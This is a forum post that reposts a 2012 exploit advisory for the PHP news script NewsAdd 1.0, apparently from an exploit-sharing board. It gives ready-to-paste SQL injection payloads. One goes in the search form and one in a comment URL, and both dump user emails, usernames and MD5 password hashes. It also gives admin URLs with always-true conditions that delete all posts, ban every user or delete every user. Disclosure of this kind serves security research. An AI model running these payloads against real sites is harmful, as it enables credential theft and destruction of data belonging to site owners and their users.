Jump to content
The_Arhitect

NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities

# Exploit Title: NewsAdd <=1.0 Multiple SQL Injection
# Google Dork: -----------------------------------
# Date: 2012/05/29
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql
# Version: 1.0
# Tested on: Debian GNU/Linux

Developer URL: http://tvaini.ueuo.com/
Vulnerabilities discovered by WhiteCollarGroup
  www.wcgroup.host56.com
  whitecollar_group@hotmail.com

If you will install NewsAdd on your system for tests, some servers have problems with tabulation.
Therefore, replace the second query:
--- begin ---
CREATE TABLE IF NOT EXISTS 'comentario' (
        'id' int(11) NOT NULL AUTO_INCREMENT,
        'id_noticia' int(11) NOT NULL,
        'usuario' varchar(15) NOT NULL,
        'comentario' text NOT NULL,
        'data' datetime NOT NULL,
        PRIMARY_KEY('id')
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ;
--- end ---
By this:
--- begin ---
DROP TABLE IF EXISTS `comentario`;
CREATE TABLE `comentario` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_noticia` int(11) NOT NULL,
  `usuario` varchar(15) NOT NULL,
  `comentario` text NOT NULL,
  `data` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--- end ---

We discovered five SQL Injection vulnerabilities on public access.
 _
|_| Vulnerabilities before login

 /
|  SQL Injection on the search form
 \
The first vulnerability is in the search form, on index. Paste this in it:
%' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc
You will get a unique line like:

admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

Lines are separated by commas (",") and columns, by "<=>".
In the return, we have two lines:

admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0
user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0

Here, we have the columns as follow:
email <=> username <=> md5(password) <=> admin? <=> banned?

 /
|  SQL Injection on comments
 \

For this, you must be a user. Register on the "cadastro.php" form.
After, access:
http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+
You will view a line like the previous example.


 _
|_| Vulnerabilities after login

 /
|  Delete all posts
 \

/admin/removerNoticia.php?id=0' or '1'='1&conf=sim


 /
|  Ban all users
 \

/admin/listarUsuarios.php?acao=banir&id=0' or '1'='1


 /
|  Delete all users
 \

/admin/removerUsuario.php?id=0' or '1'='1&conf=sim

Note that if you delete all users, you will lose access to the system.

Sursa: NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...